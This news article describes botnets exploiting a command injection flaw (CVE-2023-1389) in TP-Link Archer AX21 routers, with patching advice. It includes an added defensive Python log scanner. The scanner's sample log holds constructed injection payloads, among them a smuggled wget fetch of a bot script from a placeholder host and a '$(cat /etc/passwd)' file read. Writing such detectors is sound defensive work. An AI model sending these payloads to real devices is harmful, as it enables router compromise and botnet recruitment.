
TP-Link Routers Targeted by Botnets Exploiting One-Year-Old Vulnerability



Several malicious botnet operations have been found targeting TP-Link Archer AX21 routers through a severe security flaw that was first reported and patched last year. The vulnerability, tracked as CVE-2023-1389, is an unauthenticated command injection flaw reachable through the router’s web management interface.

The flaw was discovered by researchers in January 2023 and promptly reported to TP-Link through the Zero-Day Initiative (ZDI). TP-Link released firmware updates in March 2023 to fix it. Proof-of-concept exploit code was made public soon afterwards, however, raising concerns that attackers would adopt it.

The Botnets Exploiting the Flaw

Recent warnings from cybersecurity firm Fortinet have highlighted a dramatic spike in the exploitation of this vulnerability, with malicious activity attributed to at least six different botnet groups.

CVE-2023-1389 activity (Source: Fortinet)

According to Fortinet, daily attempts to exploit this flaw have occasionally reached between 40,000 and 50,000 since March 2024. These botnets vary not only in their origins but also in their methods of attack:

  • AGoent and Moobot both aim to download and execute malicious ELF files from remote servers to launch DDoS attacks and then remove any trace of their activity.

  • A Gafgyt variant and Miori use similar tactics for persistent connections and brute-force attacks, respectively.

  • The Mirai variants and Condi employ scripts that disrupt packet analysis tools and system processes to avoid detection and enhance their persistence on the infected devices.

Fortinet’s reports suggest that despite TP-Link’s efforts to secure the devices through firmware updates, many users remain vulnerable due to outdated firmware versions.
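The common thread in the activity described above is an unauthenticated request to the web management interface whose parameter carries shell syntax rather than the value the parameter expects. The following script is an added example, not code from the article or from Fortinet or TP-Link: it scans web-interface access logs for request parameters containing shell metacharacters, the building blocks of command injection, and counts hits per source address so that the kind of volume spike Fortinet reports stands out. The log format, the paths (`/admin/locale`, `/admin/status`), the parameter names and all addresses are constructed placeholders for illustration; real router logs differ and the vulnerable endpoint is not named in the article.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample log lines in a common-log-like format (assumed here for
# illustration). Paths, parameters and IP addresses are placeholders, not the
# real CVE-2023-1389 endpoint. Lines 2, 3 and 5 carry shell syntax in a value
# that should only ever hold a locale code; line 4 is an ordinary failed login.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Apr/2024:03:14:01 +0000] "GET /admin/status?lang=en HTTP/1.1" 200 512
203.0.113.7 - - [12/Apr/2024:03:14:02 +0000] "GET /admin/locale?region=en%3B%20wget%20http%3A%2F%2F198.51.100.9%2Fbot.sh HTTP/1.1" 200 64
203.0.113.7 - - [12/Apr/2024:03:14:03 +0000] "GET /admin/locale?region=en%60id%60 HTTP/1.1" 200 64
198.51.100.22 - - [12/Apr/2024:03:15:10 +0000] "POST /admin/login HTTP/1.1" 401 128
192.0.2.5 - - [12/Apr/2024:03:16:00 +0000] "GET /admin/locale?region=%24(cat%20%2Fetc%2Fpasswd) HTTP/1.1" 200 64
192.0.2.5 - - [12/Apr/2024:03:16:01 +0000] "GET /admin/status?lang=de HTTP/1.1" 200 512
"""

# Common-log-style line: client IP, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# Shell metacharacters and command-substitution constructs that have no
# legitimate place in a locale/language parameter.
INJECTION_RE = re.compile(r'(;|\|\||&&|\||`|\$\(|\$\{)')


def parse_line(line):
    """Parse one log line into a dict with decoded query parameters, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    # parse_qsl decodes once; unquote again so a double-encoded payload is
    # still inspected in its decoded form.
    rec["params"] = [(k, unquote(v)) for k, v in parse_qsl(url.query, keep_blank_values=True)]
    return rec


def suspicious_params(rec):
    """Return (name, decoded value) pairs whose value contains shell syntax."""
    return [(k, v) for k, v in rec["params"] if INJECTION_RE.search(v)]


def analyze(log_text):
    """Scan log text; return the list of hits and a per-source-IP hit count."""
    hits = []
    per_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        bad = suspicious_params(rec)
        if bad:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "params": bad})
            per_ip[rec["ip"]] += 1
    return hits, per_ip


if __name__ == "__main__":
    found, counts = analyze(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['ip']} {h['path']} -> {h['params']}")
    print("injection attempts per source:", dict(counts))
```

The check is deliberately on the decoded parameter value rather than on a specific URL, so it keeps working when attackers vary the endpoint or encoding; the trade-off is that any parameter that legitimately accepts free text would need to be excluded from the scan. A device whose web interface is exposed to the internet will show this pattern in bulk; a device whose administration panel is reachable only from the LAN, as the mitigation section below recommends, should show none of it from outside addresses.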

Users of TP-Link Archer AX21 routers should ensure their firmware is up to date. Following the manufacturer’s step-by-step guide to update the router’s firmware is the best way to protect against this vulnerability.

In addition, users should consider changing the default admin passwords and disabling any unnecessary web access to the administration panel in an effort to strengthen their security posture.

Final Word

Staying informed about the latest cybersecurity threats and taking proactive steps to secure devices is more important than ever. Updating your router’s firmware and changing default settings are quick steps that go a long way in protecting you from unwanted intruders. 

Author: Anas Hasan

Date: April 18, 2024

Anas Hassan is a tech geek and cybersecurity enthusiast. He has a vast experience in the field of digital transformation industry. When Anas isn’t blogging, he watches the football games.
